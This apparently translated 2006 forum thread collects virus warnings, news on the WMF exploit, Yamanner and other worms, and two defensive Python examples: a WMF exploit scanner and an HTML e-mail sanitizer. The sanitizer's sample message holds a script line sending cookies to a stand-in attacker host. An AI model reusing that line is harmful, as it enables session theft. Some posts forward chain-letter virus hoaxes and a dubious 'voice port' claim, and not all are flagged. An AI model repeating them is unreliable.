PMT Forum

Virus/Exploit/Security Warnings

koyut · 81 · 34014

chavarlison

  • Grand Admiral Thrawn
  • Forum Master 300
  • ***
    • Posts: 332
    • Likes Received: +0/-0
Hello Firefox users, I have a problem with downloading anything from the browser, whether it's a critical update or plugins. I can only download when I save it manually, then open the program and run it. Do you guys know what I did wrong?


louie929

  • Junior Member
  • **
    • Posts: 33
    • Likes Received: +0/-0
Got this from one of the blog sites I read. Remember that it's an IMAGE exploit. Even if you're using FIREFOX, please check whether you're using a version higher than 1.0.4.

Quote
   Surfing just got more dangerous..
    Windows image file exploit W32/PFV-Exploit
    www.f-secure.com/weblog/arch…5.html#00000752

    Those using IE or any browser using IE engine like Avant or Maxthon to surf might wanna consider switching to Firefox or Opera.

    Those with Firefox 1.0.4 and below, you might want to upgrade to a higher release.

    If you have not done so, best to also uncheck the “Allow websites to install software” and “Enable Java” in FF whenever you surf.
    Tools -> Options -> Web Features

    Quote:
    excerpt…

    Note that you can get infected if you visit a web site that has an image file containing the exploit. Internet Explorer users might automatically get infected. Firefox users can get infected if they decide to run or download the image file.

    In our tests (under XP SP2) older versions of Firefox (1.0.4) defaulted to open WMF files with “Windows Picture and Fax Viewer”, which is vulnerable. Newer versions (1.5) defaulted to open them with Windows Media Player, which is not vulnerable…but then again, Windows Media Player is not able to show WMF files at all so this might be a bug in Firefox. Opera 8.51 defaults to open WMF files with “Windows Picture and Fax Viewer” too. However, all versions of Firefox and Opera prompt the user first.

Switch to Firefox (latest version is 1.5) today. Especially for those people who are into 12DailyPro and other autosurfs. You can check out the button on the bottom right of our sidebar. It's free and integrates with the Google toolbar, nifty.
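
The F-Secure excerpt says the danger is an image file, not an executable. What makes a WMF file dangerous in this case is a specific record: a META_ESCAPE record whose escape sub-function is SETABORTPROC, which the vulnerable GDI code (patched in MS06-001) treated as code to call. The scanner below, added here as an example and not code from F-Secure or the original post, walks the WMF record list and flags that pattern. The record layout follows the WMF format; the constants and the two sample files are constructed for the example.

```python
"""Scanner for the WMF record pattern behind the Windows image-file exploit
(MS06-001): a META_ESCAPE record whose escape sub-function is SETABORTPROC.
Added example for this thread; not code from F-Secure or the original post.
Record layout follows the WMF format; the sample files below are constructed."""
import struct

PLACEABLE_KEY = 0x9AC6CDD7    # magic of the optional 22-byte placeable header
META_EOF = 0x0000
META_ESCAPE = 0x0626
ESCAPE_SETABORTPROC = 0x0009  # escape sub-function abused by the exploit


def _records(data, offset):
    """Yield (function, params) per record; function None marks a malformed record."""
    while offset + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, offset)
        size = size_words * 2
        if size < 6:               # a record can't be smaller than its own header
            yield None, b""
            return
        yield func, data[offset + 6:offset + size]
        if func == META_EOF:
            return
        offset += size


def scan_wmf(data):
    """Return a list of findings; an empty list means no suspicious record."""
    findings = []
    offset = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        offset = 22                # skip the placeable header
    if len(data) < offset + 18:
        return ["truncated header"]
    hdr_type, hdr_size, _version = struct.unpack_from("<HHH", data, offset)
    if hdr_type not in (1, 2) or hdr_size != 9:
        findings.append("unexpected METAHEADER type/size")
    offset += 18
    for func, params in _records(data, offset):
        if func is None:
            findings.append("malformed record size")
            break
        if func == META_ESCAPE and len(params) >= 4:
            esc_func, byte_count = struct.unpack_from("<HH", params, 0)
            if esc_func == ESCAPE_SETABORTPROC:
                findings.append(
                    f"META_ESCAPE/SETABORTPROC with {byte_count} payload bytes")
    return findings


# Helpers to build constructed sample files (not real captures).
def _record(func, params=b""):
    body = struct.pack("<H", func) + params
    body += b"\x00" * (len(body) % 2)          # records are WORD-aligned
    return struct.pack("<I", (4 + len(body)) // 2) + body


def _metaheader(records):
    total_words = (18 + sum(len(r) for r in records)) // 2
    max_words = max(len(r) for r in records) // 2
    return struct.pack("<HHHIHIH", 2, 9, 0x0300, total_words, 0, max_words, 0)


def _placeable():
    return struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0)


_EOF = _record(META_EOF)
BENIGN_WMF = _metaheader([_EOF]) + _EOF

_FAKE_PAYLOAD = b"\x90" * 8                   # stand-in for the attacker's code
_ESCAPE = _record(META_ESCAPE,
                  struct.pack("<HH", ESCAPE_SETABORTPROC, len(_FAKE_PAYLOAD))
                  + _FAKE_PAYLOAD)
EXPLOIT_SHAPED_WMF = _placeable() + _metaheader([_ESCAPE, _EOF]) + _ESCAPE + _EOF

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WMF), ("exploit-shaped", EXPLOIT_SHAPED_WMF)):
        print(name, scan_wmf(blob) or "clean")
```

A check like this is a triage aid, not a fix: a real sample can lie in its size fields or hide the record behind a non-image extension, since Windows picks the handler by content. The fix is the MS06-001 patch; before it shipped, Microsoft's interim workaround was to unregister the Picture and Fax Viewer library (regsvr32 /u shimgvw.dll), which is why the excerpt cares which program each browser hands WMF files to.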


beezymouse

  • Probie
  • **
    • Posts: 18
    • Likes Received: +0/-0
That's what they call a BUFFER OVERRUN.
In the Windows family of OSes there are a whole lot of those, so you should always update Windows. :)


cyclops

  • Forum Tambay 200
  • ***
    • Posts: 255
    • Likes Received: +0/-0
I got this from AutoSurf Alert

Quote
~ASA~ Warning Alert


PLEASE SEND THIS TO EVERYONE ON YOUR CONTACT LIST!!

A new virus has just been discovered that has been classified by Microsoft as the most destructive ever. This virus was discovered yesterday afternoon by McAfee. This virus simply destroys Sector Zero of the hard disk, where vital information for its functioning is stored.

This virus acts in the following manner:
It sends itself automatically to all contacts on your list with the title:

"A Card for You".

As soon as the supposed virtual card is opened the computer freezes
so that the user has to reboot. When the ctrl+alt+del keys or the reset
button are pressed, the virus destroys Sector Zero, thus permanently
destroying the hard disk. Yesterday in just a few hours this virus caused
panic in New York, according to news broadcast by CNN.

This alert was received by an employee of Microsoft itself.

So don't open any mails with subject: "A Virtual Card for You."
As soon as you get the mail, delete it!! Even if you know the sender !!!
Please pass this mail to all of your friends.
Forward this to everyone in your address book. I'm sure most people, like myself, would rather receive this notice 25 times than not at all.

Best Regards,

Brian


careful folks:)


lx638

  • Moderation is Virtue
  • Forum Expert 500
  • ****
    • Posts: 544
    • Likes Received: +0/-0
I just got this from http://www.thehyipforum.com/message8646-.html

Quote


I came across this and I thought it might help someone on this forum. Anything I can do to protect myself from hackers I want to know about. I know a lot of people here use MSN and Yahoo Messenger and other programs like that. Anyhow, hope it helps.

Quote
Dear Members,

I found out some information very recently that could make it easy for hackers/keyloggers to get access to 12DailyPro member accounts (including payment processors).

I will narrate it as it happened to a friend of mine very recently. It goes thus:


He (my friend) was chatting with somebody he met in a yahoo messenger chat room for the first time. As the conversation progressed, the person he was chatting with told my friend his Username and Password (i.e my friend's user name and password).

My friend was in a state of shock. He then asked this "Hacker" how he got hold of his account details, since they were at opposite ends of the earth. Fortunately the hacker decided to reveal how.

He (Hacker) said that anytime anybody logs on to any of the instant messengers (Yahoo, MSN, Google Talk, Skype, PalTalk etc.) and creates a communication path with anybody (as in the moment he starts chatting with anybody), e.g. clicking on a member from his Yahoo list or going into general chat rooms, a VOICE PORT is automatically opened.

It is thru this voice port that hackers take advantage and are able to get user names and passwords of any account open at that point in time and not just that of messaging software.

So this implies that if your 12DailyPro/e-gold etc. accounts are open while your messenger is on, then you are prone to attacks from hackers because your voice port is open.

In that regard, make sure you are through (close all investment accounts) with all your surfing /investments accounts before you open any messaging software.

And vice versa, before you open any of your surfing/egold accounts, make sure you are not logged on to your instant messenger.


For those who do not know, Windows XP, Windows 2000 and Windows 2003 have their own built-in messenger for communicating with other nodes on the network, which has a port (port 135) that may be open. If it is, go and close it using your firewall. If you cannot block it for some reason, disable it using the instructions below:


For Windows 2000 and XP

* Go to start and click Run
* Type services.msc
* Double-click on Messenger.
* In the Messenger Properties window, select Stop, then choose Disable as the Startup Type.
* Click OK.

For Windows 95, 98, and ME

* Under Control Panel, select Add/Remove.
* Select Windows Setup.
* Select System Tools.
* Click Details.
* Uncheck WinPopUp.
* Click OK.



At the end of the conversation, my friend then asked the hacker how he was able to know about all this. He (Hacker) replied that his father works for a security agency and therefore put him through some of these hacking techniques. He (Hacker) claims that he does not take advantage of these loopholes inherent in messaging software.

Well, 12DailyPro members, that is a penny for your thoughts.


chimeron

  • Forum Tambay 150
  • ***
    • Posts: 183
    • Likes Received: +0/-0
The only time you send your username and password for login systems like 12dp is during the login procedure itself. After that, your browser only passes an encrypted session ID to the 12dp site, so you stay logged in.

HTTP is a stateless protocol, meaning there is no permanent connection between the web server and the client browser. So there is no constant stream of data that could be intercepted.


aapuntar

  • Forum Master 400
  • ***
    • Posts: 402
    • Likes Received: +0/-0
For me, just use the Firefox browser or another Mozilla-based browser like Netscape. Dump IE! :D

Honestly, every time I use IE my spyware scanner always finds these "tracking cookies". And back when I really used IE, my PC was prone to viruses and spyware that made my PC crash constantly.

Using Firefox, I don't have that problem, even when I'm chatting using any messenger. I don't know about you guys though. :D

But as the experts say, "There's nothing secure when you're online!"
« Last Edit: Feb 10, 2006, 09:55 AM by aapuntar »


chad

  • Senior Member
  • **
    • Posts: 99
    • Likes Received: +0/-0
Your password on your email is the same as the one on the messenger.

Data from your browser can be intercepted by some patched application in your browser, since they may be able to access any data coming from your browser. They could be your toolbars! :D

and Firefox is not exempted.


chimeron

  • Forum Tambay 150
  • ***
    • Posts: 183
    • Likes Received: +0/-0
Avoid updating your McAfee virus definition files from un-updated download sites until further notice. A specific update is currently causing havoc in computer systems everywhere. McAfee has already issued a fix for the faulty DAT files but it may take some time before third party download sites can make the necessary updates.

http://www.informationweek.com/news/showArticle.jhtml?articleID=181503325
« Last Edit: Mar 15, 2006, 12:19 AM by chimeron »


trojsioux

  • Jill of All Trades
  • Forum Master 400
  • ***
    • Posts: 435
    • Likes Received: +0/-0
Ugh, we just bought McAfee's all-in package... with antivirus, firewall, personal privacy service, adware... just 3 weeks ago.

I haven't checked yet whether there really are affected files...

thanks for the tip chimeron


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Thanks for the update, chimeron.

I used McAfee before, but have now transferred to Panda Antivirus
integrated with Anti-spyware and Firewall.

:cool:


lx638

  • Moderation is Virtue
  • Forum Expert 500
  • ****
    • Posts: 544
    • Likes Received: +0/-0
Ugh. Only McAfee is allowed for me, that's the only one I can update. Anyway, I update directly over the internet, not by downloading the DAT file. Is that what you mean?

Thanks. I'll also switch at the end of the month.


LuckyGold7

  • Forum Tambay 100
  • ***
    • Posts: 104
    • Likes Received: +0/-0
Me too, McAfee is the best for me. My antivirus updates automatically anyway.


chimeron

  • Forum Tambay 150
  • ***
    • Posts: 183
    • Likes Received: +0/-0
^ That news is already two weeks old, Lucky. It's OK now, McAfee's problem is solved. :D


wataru

  • I @m n0 Sup3rmaN
  • Forum Expert 500
  • ****
    • Posts: 508
    • Likes Received: +0/-0
Waaahh, I use McAfee. What's its effect on the system if you download it? I'm fond of downloading updates for my antivirus.


kahel

  • Forum Master 300
  • ***
    • Posts: 385
    • Likes Received: +0/-0
You could be a victim.  Check it out!

http://bl.net/forwards/gulvirus.html


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
The internet isn't as friendly as when it first started. Then, antivirus software was an option. Now it's already a must.

What complicates things are hoaxes that make us see ghosts.

Wonder if anyone can come up with a near-to-perfect solution to all this.

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
When you talk about "Stardust," what comes to mind is something romantic, dreamlike, and something that's magical in a nice, feel-good way. In the story of Peter Pan, it's what helps kids fly when they're happy.

So stardust is good right? Generally, yes ... until some whacko comes along and ruins it for us. Read this,

Quote
Stardust virus lands on OpenOffice

Researchers at Kaspersky Lab have spotted what they believe is the first virus for OpenOffice, the open-source rival to Microsoft's Office productivity suite.

The virus, dubbed Stardust, is capable of infecting OpenOffice and StarOffice, which is sold by Sun Microsystems, a Kaspersky Lab researcher wrote on the Russian company's Viruslist Web site on Tuesday.

"Stardust is a macro virus written for StarOffice, the first one I've seen," the researcher wrote. "Macro viruses usually infect MS Office applications."

The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

So far, Stardust is a proof-of-concept virus, which means that it was created to demonstrate that an OpenOffice virus is possible. The virus has not been sent out in the wild and is not actually attacking people's systems.

The story is different for Microsoft Office applications: A yet-to-be-patched security hole in Word has been exploited in at least one recent cyberattack.

A new "macro virus" is like a blast from the past. Viruses have evolved significantly. Boot sector pests were around from 1986 to 1995, followed by macro viruses that exploited early Microsoft Windows operating systems, according to security company F-Secure. The advent of e-mail subsequently propelled e-mail viruses such as the "I Love You" and the Anna Kournikova virus.

http://news.zdnet.com/2100-1009_22-6078475.html?tag=nl.e589

 :cool:
« Last Edit: Jun 01, 2006, 09:53 AM by rma2003 »


nailbiter

  • Alalay ng
  • Moderator
  • *
    • Posts: 4,322
    • Likes Received: +1/-0
OT: I was puzzled by the title of the post, "StarDust: When It's Not Good for You." FYI, stardust is street slang for cocaine.
« Last Edit: Jul 28, 2006, 11:33 AM by nailbiter »


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Oops! Sorry about that! Not really familiar with "talkies" concerning drugs.

 :cool:


DropZite

  • Forum Tambay 200
  • ***
    • Posts: 278
    • Likes Received: +0/-0
I was puzzled by the title too, since when has stardust been good?


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Hmmm ... I guess if you're in Never-Never Land soaring the skies with Peter Pan and the gang  :)

 :cool:


nailbiter

  • Alalay ng
  • Moderator
  • *
    • Posts: 4,322
    • Likes Received: +1/-0
OT: Isn't it fairy dust or pixie dust in Peter Pan?


annanymous

  • Anonymous
  • Moderator
  • *
    • Posts: 2,068
    • Likes Received: +0/-0
When I read the word "stardust", what came to mind was Jose Mari Chan's song "Perfect Christmas". Turns out rma2003 was referring to a virus. :)


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
OT: Isn't it fairy dust or pixie dust in Peter Pan?

Yes, but some have referred to it also as stardust.

Quote from: Annanymous
When I read the word "stardust", what came to mind was Jose Mari Chan's song "Perfect Christmas". Turns out rma2003 was referring to a virus.

Amazing how something good has been twisted by many today. I guess this is just a way to get back what has been perverted and restored back to its proper use.

 :cool:


aleckxis

  • Forum Master 400
  • ***
    • Posts: 465
    • Likes Received: +0/-0
Hello Guys!,

I just received this warning in my email just this morning.


Quote
Subject: VERY IMPORTANT WARNING!!!
   
VERY IMPORTANT WARNING


This is not a joke!
Please be extremely careful, especially if using internet mail such as Yahoo, Hotmail, AOL and so on. This information arrived this morning direct from both Microsoft and Norton.

Please send it to everybody you know who has access to the Internet.
You may receive an apparently harmless email with a PowerPoint presentation "Life is beautiful."

If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately. If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful." Subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, e-mail and password.

This is a new virus which started to circulate on Saturday afternoon. AOL has already confirmed the severity, and antivirus software is not capable of destroying it. The virus has been created by a hacker who calls himself "life owner."

PLEASE SEND A COPY OF THIS EMAIL TO ALL YOUR FRIENDS and ask them to PASS IT ON IMMEDIATELY.

Thought I would pass this on to my members,
Came from a VERY reliable source!

Admin
PD-Info

I'm not sure whether any of you have also received a warning like this.



rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Thanks Aleckxis,

This is yet another one of the same ones I've been receiving.

Thanks for the warning.

 :cool:


FutureGizmo

  • Admin
  • *
    • Posts: 5,077
    • Likes Received: +5/-0
Although it's right to protect your PC against possible viruses and other malicious software, this email is a hoax, so don't forward the mail to other people anymore.

http://securityresponse.symantec.com/avcenter/venc/data/life.is.beautiful.hoax.html

When you receive warnings like this, and other mails like the Bill Gates or AOL-Microsoft ones, try searching first whether the mail is a hoax, so you don't forward the mail to others.


aleckxis

  • Forum Master 400
  • ***
    • Posts: 465
    • Likes Received: +0/-0
That's the hard part for me. Even when the emails I receive need to be forwarded, I'm not fond of forwarding, so actually the people sending me email are just wasting their time. Mostly I really don't open emails. That's why my email box is flooded with unopened emails. Actually, it was just an accident that I opened that email, because I clicked wrong since it was right next to the email I was going to open. My mouse kind of slipped, so that one got opened. Hehehe, anyway, it's good that I opened it, I learned some information somehow.


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Because of many demands for more security, Microsoft is unloading a lot of security patches in the days ahead. It probably also has something to do with their plan to release complete protection packages. How would people believe them, when they can't even secure their own environment?

Anyway, read all about it here,

Quote
Bumper crop of Microsoft patches on the way

Microsoft customers should brace for an onslaught of security updates.

As part of a monthly patching cycle, the software maker plans to release on Tuesday a dozen security bulletins with fixes for flaws. Nine of the bulletins address problems in Windows, two relate to Office and one to the Exchange e-mail server software.

At least one of the Windows and one of the Office alerts is deemed "critical," Microsoft's highest risk rating, the company said in a notice posted on its Web site Thursday.

Additionally, the June patches will permanently alter the way Internet Explorer handles Web programs called ActiveX controls. Microsoft introduced the change, which may affect how certain Web sites are displayed in the browser, two months ago. It gave Web developers a "compatibility patch" to give them time to adjust to the new process, but the June security updates will end that respite, Microsoft said.

Microsoft did not specify how many flaws its security updates will tackle, or say which components of Windows, Office and Exchange are being repaired. It has said that it plans to release a fix for a vulnerability in Word that has been exploited in at least one targeted cyberattack.

Over the past weeks, security researchers have reported several unpatched flaws in Internet Explorer, the Web browser component of Windows.

Last month, Microsoft released three security bulletins, two of which addressed issues in Windows and Exchange. Another was for a problem in Adobe Systems' Macromedia Flash software.

Also on Tuesday, Microsoft will release an updated version of its Windows Malicious Software Removal Tool. The software detects and removes common malicious code placed on computers.

The company gave no further information on the upcoming bulletins, other than stating that the fixes may require restarting the computer or server.

The Redmond, Wash., software maker offers advance notification about patches so people can get ready to install the updates.

Microsoft said it will host a Webcast about the new fixes on Wednesday at 11 a.m. PT.

http://news.zdnet.com/2100-1009_22-6081634.html?tag=nl.e589

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Whoops ... MS admits defeat here!

Quote
No fix for 'critical' hole in Windows 98, ME

Microsoft will not fix a serious flaw in Windows 98 and Windows Millennium Edition because a patch could break other applications.

The security bug relates to Windows Explorer and could let an intruder commandeer a vulnerable PC, Microsoft warned in April. The software maker has made fixes available for Windows Server 2003, Windows XP and Windows 2000, but it has found that eliminating the vulnerability in Windows 98 and ME is "not feasible," it said.

"To do so would require re-engineering a significant amount of a critical core component of the operating system," Microsoft said in a Thursday update to its MS06-015 security bulletin. "After such a re-engineering effort, there would be no assurance that applications designed to run on these platforms would continue to operate."

Instead, Microsoft recommends that people who still use the older operating systems protect their PCs by using a network firewall that filters traffic on TCP Port 139. "Such a firewall will block attacks attempting to exploit this vulnerability from outside of the firewall," it said.

The software maker even had trouble with its fix for Windows XP. It had to revise the update and release it a second time because the patch caused problems for people who used Hewlett-Packard Share-to-Web software or older Nvidia graphics drivers.

Microsoft is phasing out support for the older operating systems. Windows 98 was released in June 1998, Second Edition followed a year later, and Millennium Edition came out in 2000. Microsoft has been providing fixes for only "critical" flaws the past couple of years and is ending support altogether next month, after its planned July 11 patch release. Windows XP with Service Pack 1 reaches its end of support on Oct. 10, 2006.

Not providing fixes leaves users vulnerable, but software can't be supported forever, said Michael Sutton, a director at security intelligence company iDefense, a part of VeriSign. "At some point, any vendor has to make a business decision to cease product support, and these products are now 7 to 8 years old," he said.

The older Windows versions have never been secure, said Russ Cooper, a senior scientist at Cybertrust, a security vendor in Herndon, Va. "The lack of a 'critical' patch does not weaken these OSes. Instead, it should merely put an end to their perception that they were secure before this fault came to light," he said.

And as far as blocking traffic on port 139 goes, it is a network port that has been abused in the past for attacks, said Don Leatham, director of solutions and strategy at PatchLink. "Most organizations will already have port 139 blocked," he said. "Although it is good that Microsoft is reiterating this, I don't see it being a huge impact."

The best way to secure PCs that run older versions of Windows is upgrading the operating system, Microsoft suggested.

"With the upcoming end (of) support for these products, we strongly recommend that those of you who are still running these older versions of Windows upgrade to a newer, more secure version, such as Windows XP SP2, as soon as possible," Christopher Budd, a staffer in Microsoft's security response center, wrote on the team's blog.

http://news.zdnet.com/2100-1009_22-6082307.html?tag=nl.e550

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Are you a Yahoo email user like I am?

Did you receive an email from someone you know and may be in your contact list with this subject, "New Graphic Site", like I did?

Then beware! DO NOT OPEN this email. It contains a virus that has infected a portion of the Yahoo database. You don't need to download any attachment. All you need is to click it open to be infected.

How do you combat this? Here, read more about it.

Quote
Worm wriggles through Yahoo mail flaw

A new worm that targets Yahoo e-mail users is on the loose, taking advantage of a JavaScript flaw, a security company has warned.

The Yamanner worm targets all versions of Yahoo Web-based mail except the latest beta version, Symantec said in an advisory released Monday.

At the time of the advisory, there was no patch for the vulnerability. But by later on Monday, Yahoo said it had come up with a fix for the flaw, which it said had affected very few of its customers.

"We have taken steps to resolve the issue and protect our users from further attacks of this worm. The solution has been automatically distributed to all Yahoo Mail customers, and requires no additional action on the part of the user," a Yahoo representative said.

Both Yahoo and Symantec are encouraging people to update the antivirus definitions on their PCs.

Yamanner arrives in a Yahoo mailbox bearing the subject header "New Graphic Site." Once the message is opened, the computer becomes infected and the worm spreads itself to people on the Yahoo e-mail contact list. The harvested e-mail addresses are also sent to a remote online server, which Symantec suspects may use the information for spam campaigns.

"The worm is taking a pretty novel approach," said Dean Turner, senior manager of Symantec Security Response. "It takes advantage of a JavaScript vulnerability, so the user doesn't even have to click on an attachment to get infected."

Yamanner exploits the Yahoo flaw by enabling the scripts that are embedded in HTML e-mails to be run by the user's Web browser.

The worm, which was spotted in the wild early this morning, has hit the remote server more than 100,000 times, forwarding Yahoo e-mail addresses harvested from unsuspecting users, Turner said.

Although the worm is spreading quickly, and no patch has been issued, Symantec is rating the threat a "2." The security vendor uses a 1-to-5 rating system, with "5" as its most severe category.

"Antivirus definitions have been released for it, and Yahoo is working on a patch, so we don't want to cry wolf," Turner said. "Although there is the potential the worm will affect a larger number of people, for now to raise it to another (higher) level would be inappropriate."

He added it is premature to predict whether this worm will morph into other forms and attack other browser-based forms of e-mail, such as Google's Gmail.

Systems affected include Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003 and Windows XP, according to Symantec's advisory.

http://news.zdnet.com/2100-1009_22-6082934.html?tag=nl.e589

 :cool:
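
The article above says Yamanner needed no attachment: the mail body itself carried script, and the webmail filter let it reach the browser, which ran it with the victim's session. The usual fix for this class of bug is to parse the HTML and rebuild it from an allow-list, instead of trying to spot bad strings with regular expressions. The sanitizer below is an added example for this thread, not Yahoo's or Symantec's code, and it does not reproduce the specific filter bypass Yamanner used; the tag/attribute allow-list and the sample message are constructed for the example.

```python
"""Allow-list sanitizer for HTML e-mail, the kind of filtering a webmail front
end must do before rendering a message so that embedded scripts and event
handlers never reach the reader's browser. Added example for this thread; not
Yahoo's or Symantec's code. The sample message below is constructed."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img",
                "div", "span", "ul", "ol", "li", "blockquote"}
VOID_TAGS = {"br", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}   # no javascript:, data:, vbscript: or relative URLs
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "applet"}


def safe_url(value):
    """Accept only absolute http(s) URLs. Browsers ignore tabs and newlines
    inside a URL, so strip them before looking at the scheme."""
    cleaned = value.strip().replace("\t", "").replace("\n", "").replace("\r", "")
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()          # convert_charrefs=True: text arrives decoded
        self.out = []
        self.open_tags = []
        self.skip_depth = 0         # >0 while inside an element dropped with its content

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                  # unknown tag dropped; its text content is kept
        kept = []
        for name, value in attrs:   # html.parser lowercases tag and attribute names
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while True:                 # close anything the sender left open inside it
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))
    # comments, declarations and processing instructions are dropped by default


def sanitize_html_email(html):
    """Return a rebuilt copy of html containing only allow-listed markup."""
    p = EmailSanitizer()
    p.feed(html)
    p.close()
    while p.open_tags:              # balance tags the sender left open
        p.out.append(f"</{p.open_tags.pop()}>")
    return "".join(p.out)


# Constructed sample message in the shape the article describes: script in the
# body, an event handler on an image, and a javascript: link. Not a real capture.
SAMPLE_EMAIL = (
    '<p>Check out my <a href="http://example.com/gallery" onclick="steal()">'
    'New Graphic Site</a>!</p>'
    '<IMG SRC="http://example.com/pic.jpg" ONLOAD="sendCookies()">'
    '<script>location="http://evil.example/?c="+document.cookie</script>'
    '<a href="\tjavascript:alert(document.cookie)">click</a>'
    '<b>unclosed bold'
)

if __name__ == "__main__":
    print(sanitize_html_email(SAMPLE_EMAIL))
```

The important design choice is that nothing from the input is copied through: every tag, attribute and text node is re-emitted from the parser's view of the document, so tricks that confuse a regex (mixed case, tabs inside a URL, an unclosed tag swallowing the rest of the page) cannot smuggle a handler past the filter. Rendering the mail in a separate origin from the webmail application is the other half of the defence, so that even a filter miss cannot read the session.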


nailbiter

  • Alalay ng
  • Moderator
  • *
    • Posts: 4,322
    • Likes Received: +1/-0
Tsk, tsk, MS really are snakes.

--------------------
Windows shortcut 'trick' is a feature: Microsoft

Munir Kotadia, ZDNet Australia
July 05, 2006
URL: http://www.zdnet.com.au/news/security/soa/Windows_shortcut_trick_is_a_feature_Microsoft/0,2000061744,39262246,00.htm


Microsoft has denied that a 'trick,' which could allow an executable file to be launched when a user types a Web address into Internet Explorer, is a security vulnerability.

Using Windows XP and Internet Explorer, it is easy to create a scenario where a user types in a Web address -- such as www.microsoft.com -- into their browser and, instead of launching the Web site, the browser runs an executable file that is located on the user's computer.

    To test the 'trick' yourself, try the following:

        * Right click on the Desktop and create a new Shortcut
        * Point the shortcut to an executable -- such as c:\windows\system32\calc.exe
        * Call the shortcut www.microsoft.com
        * Start Internet Explorer and type "www.microsoft.com" into the address bar

    If the shortcut is then deleted -- or the characters "http://" are added before the "www" in the browser address bar -- then IE will once again connect to the Internet as expected.

In a statement to ZDNet Australia on Tuesday, Peter Watson, chief security advisor at Microsoft Australia, said this is not a security vulnerability but actually a feature that could be used by legitimate applications.

"It's important to clarify the difference between security problems and legitimate features. A security hole helps an attacker do something they shouldn't be able to do, which is not the case in this instance.

"Software that the user legitimately has installed on the computer might need exactly this sort of feature provided by IE," said Watson.

According to Watson, the 'trick' could be used to help automation.

"For example, imagine if you needed to run a dialup connection to connect to a certain site. The dial up connection might be called "connect to mysite.com". You can see in that case how important it is for Windows (or any operating system) to have flexibility for legitimate software.

"Organisations or individual users may require or desire to automate part of the process for application connectivity with IE. Microsoft views this as one of the advantages in using IE as a means of enabling user access in that it provides users a consistent and seamless experience," said Watson.

However, security experts believe this particular 'trick' is unnecessary and expect it to be exploited by malware writers.

Michael Warrilow, director of Sydney-based analyst firm Hydrasight, told ZDNet Australia that he tested the 'trick' using Windows XP SP2 and found that although it worked using IE, Firefox users were safe.

"Microsoft's so-called useful features have been shown time and again to result in security exposures that are ultimately exploited for malicious purposes. This will be no exception," he said.

Frost and Sullivan Australia's security analyst, James Turner agreed: "I would imagine that malware writers could definitely exploit this -- particularly with a little social engineering."

--------------------





rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Ok, guys. I know we need to update our OS frequently because that should help secure our systems all the more. But beware of this new worm masquerading as a system update.

Got this from a newsletter,

Quote
*New Worm Pretends to be WGA Tool:

There is a new worm that pretends to be Microsoft's Windows Genuine Advantage (WGA) anti-piracy tool. The Cuebot-K worm spreads via AOL Instant Messenger, registering itself as a new system driver service called 'wgavn'. It carries the display name 'Windows Genuine Advantage Validation Notification', and runs automatically during system startup. If you view the list of services, it says that removing or stopping the service will result in 'system instability'. Once in place the worm disables the Windows firewall, and opens a backdoor to infected computers which allows hackers to gain remote access, spy on users, and potentially launch distributed denial-of-service attacks. "People may think they have been sent the file from one of their AOL IM buddies, but in fact the program has no friendly intentions," said Graham Cluley, senior technology consultant at Sophos.


 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
My upline sent this warning to me,

Quote
There is currently a phishing e-mail doing the rounds which
